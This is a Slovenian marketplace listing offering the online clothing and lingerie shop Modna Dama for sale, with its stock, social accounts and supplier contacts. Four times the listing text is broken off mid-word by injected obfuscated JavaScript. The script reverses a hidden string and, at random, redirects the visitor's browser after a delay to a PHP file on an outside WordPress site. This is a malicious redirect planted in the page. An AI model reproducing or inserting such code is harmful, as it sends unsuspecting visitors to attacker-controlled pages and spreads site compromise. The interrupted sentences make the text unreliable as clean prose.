Prodamo spletno trgovino MODNA DAMA z vso zalogo

 Spletna trgovina

18.000,00€

Zaradi bolezni se prodaja spletna trgovina Modna Dama.

Trgovina, ki se pd leta 2016 ukvarja s prodajo spodnjega perila Poljskega proizvajalca in prodajo oblačil večjih velikosti, proizvajalcev iz Poljske, Madžarske, Nizozemske, Španije in Velike Britanije.
Posebnost trgovine je, da ponuja modrčke večjih velikosti, košarice do velikosti P, kar slovenski trg zaenkrat še ne ponuja.

Trgovina je aktivna, tako da s poslom lahko začnete takoj. Ker je aktivna se tudi vrednost zaloge spreminja. Trenutno se zaloga giblje okoli 22.000eur (in je seveda ob prodaji lahko drugačna. Zaloge zajemajo ponudbo samo EU proizvajalcev. V kolikor ne želite zaloge ali le delno zalogo, se cena seveda spremeni. Vse po dogovoru.

Trgovina ima tudi FB, IG in odprt TikTok profil. FB s približno 19.000 sledilci in IG z skoraj 2.000 sledilci.
Domena plačana do konec februarja 2024.

V ceno so vključeni poleg zaloge še vsi kontakti dobaviteljev ter podpora in sve$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovanje za prevzem posla in uspešno vodenje naprej. P

V kolikor bi želeli imeti tudi fizično trgovino, imamo na razpolago tudi medeninasta s$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tojala, lesene obešalnike in lutke, 2 predalnika s 6 predali in 6 omar s policami za hrambo, prav tako škatle, kuverte in ostali material, ki se uporablja pri pošiljanju pake$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tov. (ni vključeno v ceno).

Trgovina trenutno ne prodaja na Hrvaškem trgu, je pa stran pripravljena za $NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to.

Za več info na voljo na modna.dama7@gmail.com ali 031 564 888.

  • Listing ID: 2284
  • Vključuje: Blagovna znamka, Know-how, Dogovori s kupci, Dogovori z dobavitelji, Oprema in stroji, Zaloge, Spletna stran
  • Vključno s podjetjem: DA - delujoče
  • Brez bremen, dolgov in obveznosti: DA
  • Ustanovljeno: 2016
  • Zaloge (MPC): 17.000
Contact details

Kacova 3Podravska,2000 Show Phone Number ***** https://www.modnadama.si/

Contact this listing owner